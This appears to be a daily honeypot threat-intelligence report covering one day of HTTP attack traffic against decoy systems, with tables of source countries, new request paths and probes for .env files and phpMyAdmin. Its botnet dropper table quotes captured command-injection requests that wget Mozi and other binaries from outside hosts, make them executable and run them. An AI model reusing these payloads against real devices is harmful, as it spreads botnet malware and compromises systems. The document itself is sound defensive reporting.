Skip to main content
  1. Daily-Posts/

Report: 2025-06-12

·339 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-12
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 8 new requests that have never been observed before (these were added to the monitored request database.).

A total of 711 requests were recorded during the day, originating from 5 different countries, with a peak of 236 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
KRGermany
USGermany
DEGermany
USGermany
USGermany
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
122.97.136.8927;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
77.239.215.53GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
141.98.11.147GET /shell?cd+/tmp;iptables+-I+INPUT+-p+tcp+-s+141.98.11.147+–dport+5500+-j+ACCEPT;+iptables+-I+INPUT+-p+tcp+–dport+5500+-j+DROP;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1
141.98.11.83GET /shell?cd+/tmp;iptables+-I+INPUT+-p+tcp+-s+141.98.11.147+–dport+5500+-j+ACCEPT;+iptables+-I+INPUT+-p+tcp+–dport+5500+-j+DROP;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1
103.167.204.13227;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
462GET /aws.sh HTTP/1.1
1031GET /en/turkish-english HTTP/1.1
1781GET /t.env HTTP/1.1
1791GET /o.env HTTP/1.1
1801GET /v.env HTTP/1.1
1811GET /s.env HTTP/1.1
1981HEAD /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1
2111HEAD /sqlweb/scripts/setup.php HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0236US
174NL
263IN
347BG
444GB
531LT
631DE
726RU
825CN
915PL
1013SC
1112FR
1212NG
1311SE
147CA
156ZA
166AO
174KR
184GH
194VN
204BR
214SG
223HK
233UA
243KZ
253BE
262ES
272PT
282TW
292MC
302IT
312KW
322TH
331TR
341CO
351ID
361RO
371IR
381IE

Related

Report: 2025-06-11
·309 words
Repport Daily
Report: 2025-06-10
·335 words
Repport Daily
Report: 2025-06-09
·344 words
Repport Daily